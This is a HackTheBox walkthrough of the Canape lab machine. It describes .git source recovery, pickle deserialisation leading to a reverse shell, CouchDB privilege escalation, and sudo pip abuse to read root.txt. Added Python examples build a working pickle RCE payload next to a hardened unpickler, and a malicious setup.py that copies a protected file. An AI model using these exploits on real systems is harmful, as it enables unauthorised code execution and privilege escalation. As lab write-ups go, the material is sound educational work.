Canape Box Writeup & Walkthrough – [HTB] – HackTheBox
This article shows how to hack the Canape box and obtain both user.txt and root.txt.
Canape is a machine on the HackTheBox platform.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
First, we scan the ports, as with any other box.
We find that only the HTTP port (80/TCP) is open, so the web application must be the way in.
Open the browser and navigate to the website.
We then enumerate the website and identify an exposed
.git folder. We can now recover the website's source code by using
We also analyse the Git log, and find that the “check” function has a security issue.
__init__.py file source code:
As you can see, the code uses cPickle, a built-in Python module that serialises and deserialises objects. Inside the check function there is this line:
item = cPickle.loads(data)
pickle can reconstruct arbitrary Python objects, including by calling any importable function, so deserialising attacker-controlled data here gives remote code execution.
We use the following payload.
Then we use nc to listen on a local port and send the above payload to get a reverse shell.
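The pickle exploitation above, as an added example that is not code from the original post or from the Canape box. It is written for Python 3's pickle rather than the Python 2 cPickle the box used (the wire behaviour is the same), and it uses a harmless `echo` in place of a reverse-shell command. The vulnerable function, the payload construction, and a hardened replacement that refuses to resolve any global are shown side by side; the Homer/Doh sample data and all function names are assumptions of this example.

```python
import io
import pickle
import subprocess


class PickleRCE:
    """Serialises to a pickle that, on loads(), calls subprocess.check_output.

    pickle stores the (callable, args) pair returned by __reduce__ instead of
    the object's state, and the unpickler resolves the callable by module and
    name and invokes it. The resulting bytes never mention this class, so the
    target needs nothing but a pickle.loads() call on data we control.
    """

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        # Any importable callable works; check_output makes the effect visible.
        return (subprocess.check_output, (["sh", "-c", self.cmd],))


def build_payload(cmd):
    """Bytes an attacker would submit as the 'data' the app deserialises."""
    return pickle.dumps(PickleRCE(cmd))


def benign_payload(obj):
    """Pickle of ordinary data, i.e. what the app legitimately expects."""
    return pickle.dumps(obj)


def vulnerable_check(data):
    """The pattern from the Canape source: item = cPickle.loads(data)."""
    item = pickle.loads(data)  # the attacker's callable runs right here
    return item


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses to resolve any global, so no function or class can be called.

    Primitive values and containers still deserialise; anything that needs
    find_class (which every code-execution gadget does) is rejected.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_check(data):
    """Hardened replacement for vulnerable_check."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_check_rejects(data):
    """True if safe_check refuses the pickle (used by the checks below)."""
    try:
        safe_check(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    payload = build_payload("echo pwned")
    print(vulnerable_check(payload))    # the command ran on the loads() side
    print(safe_check_rejects(payload))  # the hardened loader refuses it
    print(safe_check(benign_payload({"char": "Homer", "quote": "Doh"})))
```

Note that the restricted unpickler only closes the code-execution path; if the application does not need arbitrary object graphs, replacing pickle with JSON is the simpler and safer fix.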
Now, we check the network connections by executing
There are three interesting listening ports: 5984, 5986 and 65535.
After some analysis, we identify that port 65535 is running SSH, and that 5984 and 5986 belong to CouchDB (5984 is its standard HTTP API port; 5986 is the node-local port of CouchDB 2.x).
First, we list all databases.
There are six databases. We then try to read the passwords database.
Unfortunately, we are not allowed to access it. However, the installed CouchDB version has a known remote privilege-escalation vulnerability with a public exploit, and we can use that. Because the database only listens on localhost, we have to run the exploit on the Canape server itself.
There are multiple ways to upload the exploit to the target. I host a simple HTTP server on my machine and download the exploit from it on the target.
Then, we execute our exploit and gain access to the password database.
We then list the documents in the database (CouchDB is a document store, so there are no tables as such).
Finally, we obtain the SSH password:
Next, we need to work on privilege escalation.
We check sudo to see what we are allowed to run.
Wow, we can run pip as root. There are two ways to obtain root.txt.
First, you can create a pip package and use this package to read root.txt. I used this way when I played this box. However, after I hacked another box, I learned another way.
As you may know, pip accepts a -r option, described as “Install from the given requirements file.” In other words, pip will read whatever file we pass it. So we create a soft link that points to root.txt, then run pip under sudo with the -r option. pip opens the linked file as root and, because its contents are not a valid requirement line, echoes the offending line in its error output, which is how we obtain the contents of root.txt.
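The first route above (a pip package that reads root.txt) as an added example; this is not the author's package or anything from the box. The point it demonstrates is that setup.py is ordinary Python that the installer executes, so under `sudo pip install <dir>` it runs as root before any package metadata is used. To stay runnable without root or pip, the example stands in a temporary directory for /root/root.txt with a constructed marker string, and triggers setup.py directly with the interpreter instead of through `sudo pip install`; file names, the package name and the marker text are all assumptions. The `-r` route is not exercised here because it depends on pip's own parsing and error output.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Template for the malicious setup.py. Everything before the setup() call is
# plain Python that the installer runs with its own privileges (root under
# `sudo pip install`). The two paths are filled in by build_malicious_package.
SETUP_PY = textwrap.dedent("""\
    import os
    import shutil
    # Payload: copy the protected file somewhere the low-privileged user can read.
    shutil.copy({target!r}, {drop!r})
    os.chmod({drop!r}, 0o644)
    try:
        from setuptools import setup
    except ImportError:   # no setuptools: the payload above has already run
        setup = lambda **kw: None
    setup(name="not-a-real-package", version="0.0.1")
""")


def build_malicious_package(pkg_dir, target, drop):
    """Write a minimal pip-installable tree whose setup.py copies target to drop."""
    os.makedirs(pkg_dir, exist_ok=True)
    setup_path = os.path.join(pkg_dir, "setup.py")
    with open(setup_path, "w") as fh:
        fh.write(SETUP_PY.format(target=target, drop=drop))
    return setup_path


def run_setup_as_installer(pkg_dir):
    """Execute setup.py the way an installer would, here as the current user.

    On the box the trigger is `sudo pip install <pkg_dir>`; this example calls
    setup.py directly so it runs without pip or root. Returns the exit status.
    """
    proc = subprocess.run([sys.executable, "setup.py", "--name"],
                          cwd=pkg_dir, capture_output=True, text=True)
    return proc.returncode


def demo():
    """Stage a stand-in root.txt, build the package, 'install' it, return the loot."""
    work = tempfile.mkdtemp(prefix="canape-pip-")
    root_txt = os.path.join(work, "root.txt")      # stand-in for /root/root.txt
    with open(root_txt, "w") as fh:
        fh.write("CONSTRUCTED-SAMPLE-FLAG\n")         # constructed marker, not a real flag
    os.chmod(root_txt, 0o600)                         # owner-only, like the real file
    drop = os.path.join(work, "loot.txt")             # where the payload leaves a copy
    pkg_dir = os.path.join(work, "evilpkg")
    build_malicious_package(pkg_dir, root_txt, drop)
    run_setup_as_installer(pkg_dir)
    with open(drop) as fh:
        return fh.read()


if __name__ == "__main__":
    print(demo(), end="")
```

Because the payload runs as root, the same primitive can do far more than read one file (write to /etc/sudoers, drop a setuid binary, and so on); the `-r` trick is quicker to type, but both rest on the fact that sudo-permitted pip executes arbitrary code and reads arbitrary files as root.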
This box is a little complicated if you have no idea how to design a web exploit. This box took me around 4 hours. I spent most of the time creating a pip package.